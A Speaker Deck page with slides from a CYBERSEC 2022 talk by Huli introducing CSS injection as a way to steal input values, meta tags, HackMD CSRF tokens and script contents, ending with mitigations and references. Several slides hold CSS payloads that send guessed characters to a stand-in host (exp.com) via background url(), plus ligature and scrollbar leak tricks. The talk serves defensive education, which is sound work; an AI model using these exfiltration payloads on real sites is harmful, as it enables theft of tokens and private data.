Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Attacking web without JS - CSS injection

Huli
September 22, 2022
Programming
0
2.3k

Attacking web without JS - CSS injection

When speaking of web security in front-end, XSS is the first thing that comes to mind. But, even without JavaScript, the attacker can still use other attack vectors like HTML injection and CSS injection! This talk is an introduction to CSS injection.

Huli

September 22, 2022
Tweet

More Decks by Huli

See All by Huli
ModernWeb 2018 - 輕鬆應付複雜的非同步操作:RxJS + Redux Observable
aszx87410
0
21
Front-end Security that Front-end developers don't know
aszx87410
2
4.8k
你懂了 JavaScript,也不懂 JavaScript - MOPCON 2021
aszx87410
3
700
接觸資安才發現前端的水真深 - Modern Web 2021
aszx87410
0
1.3k
JSDC2020 - 用 API mocking 讓前端不再苦等待
aszx87410
0
1.1k

Other Decks in Programming

See All in Programming
Prompt Engineering 勉強会 / 2023.03.21 GPT-4 Prompt 報告会
smiyawaki0820
19
8.8k
PsySHを使った効率的なデバッグ方法について / How debug efficiently using PsySH
fendo181
0
570
本当に 0 からの 関数型プログラミングの歩き始め方 / How to Walk into Functional Programming from Scratch
guvalif
1
460
PHPUnit 10 概論 / Introduction of PHPUnit 10
cocoeyes02
0
840
ブラウザの向こう側で「200 OK」を返すまでに何が起きているのか調べてみた #phperkaigi
akase244
5
1.3k
Why Cloud Zombies Are Destroying the Planet and How You Can Stop Them
hollycummins
0
360
Change Data Streaming Patterns With Debezium & Apache Flink
gunnarmorling
2
130
いろいろなフレームワークの仕組みを index.php から読み解こう / index.php of each framework
okashoi
0
560
改めて整理するWebアプリのビルド・デプロイの基本【コンテナ編】
os1ma
2
340
ウォーターフォールに思えたプロジェクトにあったアジャイルの要素
kubotak
1
190
Run Your Firebase for Web App Locally Using Firebase Emulator Suite
dicoding
0
650
Laravelプロダクト開発・運用の失敗学
shgishzk
0
190

Featured

See All Featured
How STYLIGHT went responsive
nonsquared
89
4.3k
Principles of Awesome APIs and How to Build Them.
keavy
119
16k
Put a Button on it: Removing Barriers to Going Fast.
kastner
56
2.6k
Testing 201, or: Great Expectations
jmmastey
26
5.8k
Debugging Ruby Performance
tmm1
67
11k
Visualization
eitanlees
130
12k
In The Pink: A Labor of Love
frogandcode
133
21k
Embracing the Ebb and Flow
colly
76
3.6k
What's new in Ruby 2.0
geeforr
336
30k
BBQ
matthewcrist
75
8.2k
The Illustrated Children's Guide to Kubernetes
chrisshort
24
43k
Practical Orchestrator
shlominoach
178
9k

Transcript

  1. Attacking web without JS
    CSS Injection
    Huli from Cymetrics / OneInfinity @ CYBERSEC 2022

    View Slide

  2. About
    Huli

    • Security Researcher at Cymetrics /
    OneInfinity

    • CTF player at Water Paddler

    • https://blog.huli.tw/

    View Slide

  3. Front-end Security

    View Slide

  4. Front-end Security
    => XSS(Cross-Site Scripting)

    View Slide

  5. Front-end Security
    => XSS(Cross-Site Scripting)

    View Slide

  6. IE7 (15 years ago)

    View Slide

  7. CSS injection
    => Steal data via CSS

    View Slide

  8. CSS injection
    => Steal data via CSS
    How?

    View Slide

  9. input[value^="a"]{
    background: url("//exp.com?a");
    }

    View Slide

  10. CSS selectors
    input[value^="a"] // prefix
    input[value$="a"] // suffix
    input[value*="a"] // contains

    View Slide

  11. Steal input value





    View Slide

  12. Steal input value





    input[value^="a"]{
    background: url("//exp.com?a");
    }

    View Slide

  13. Steal input value





    input[value^="a"] + input {
    background: url("//exp.com?a");
    }

    View Slide

  14. Steal input value





    View Slide

  15. has: to the rescue





    form:has(input[value^="a"]) {
    background: url("//exp.com?a");
    }

    View Slide

  16. View Slide

  17. Steal meta content



    View Slide

  18. Steal meta content



    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  19. Steal meta content



    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  20. Steal meta content



    meta {
    display: block;
    }
    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  21. Steal meta content



    meta {
    display: block;
    }
    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  22. Steal meta content



    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  23. Steal meta content



    meta, head {
    display: block;
    }
    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  24. View Slide

  25. View Slide

  26. Steal HackMD CSRF token

    View Slide

  27. Steal HackMD CSRF token

    View Slide

  28. Steal HackMD CSRF token
    HackMD Server

    View Slide

  29. Steal HackMD CSRF token
    HackMD Server
    server?token=a

    View Slide

  30. Steal HackMD CSRF token
    HackMD Server
    server?token=a
    Update content and <br/>

    View Slide

  31. Steal HackMD CSRF token
    HackMD Server
    server?token=ab
    Update content and <br/>

    View Slide

  32. Demo

    View Slide

  33. Steal CSRF token != CSRF 😢

    View Slide

  34. Steal any content
    <br/>var secret = "abc123";<br/>
    Is it possible?

    View Slide

  35. ligature
    https://zh.m.wikipedia.org/zh-tw/File:Ligatures.svg

    View Slide

  36. ligature




    horiz-adv-x="10000" d="M1 0z"/>



    View Slide

  37. ligature + scroll bar
    script {
    width: 300px;
    display: block;
    font-family: "leak";
    white-space: nowrap;
    overflow-x: auto;
    }
    script::-webkit-scrollbar {
    background: blue;
    }
    script::-webkit-scrollbar:horizontal {
    background: url(https://exp.com?a);
    }

    View Slide

  38. ligature + scroll bar

    View Slide

  39. Mitigation
    • Sanitization

    • Content Security Policy

    • style-src

    • font-src

    • Check origin/referer header

    • Same-site cookie

    View Slide

  40. Reference
    1. https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf
    2. https://x-c3ll.github.io/posts/CSS-Injection-Primitives/
    3. https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection
    4. https://research.securitum.com/stealing-data-in-great-style-how-to-use-css-to-attack-
    web-application/
    5. https://mksben.l0.cm/2021/11/css-exfiltration-svg-font.html
    6. https://github.com/masatokinugawa/css-exfiltration-svg-font/

    View Slide

  41. Q&A

    View Slide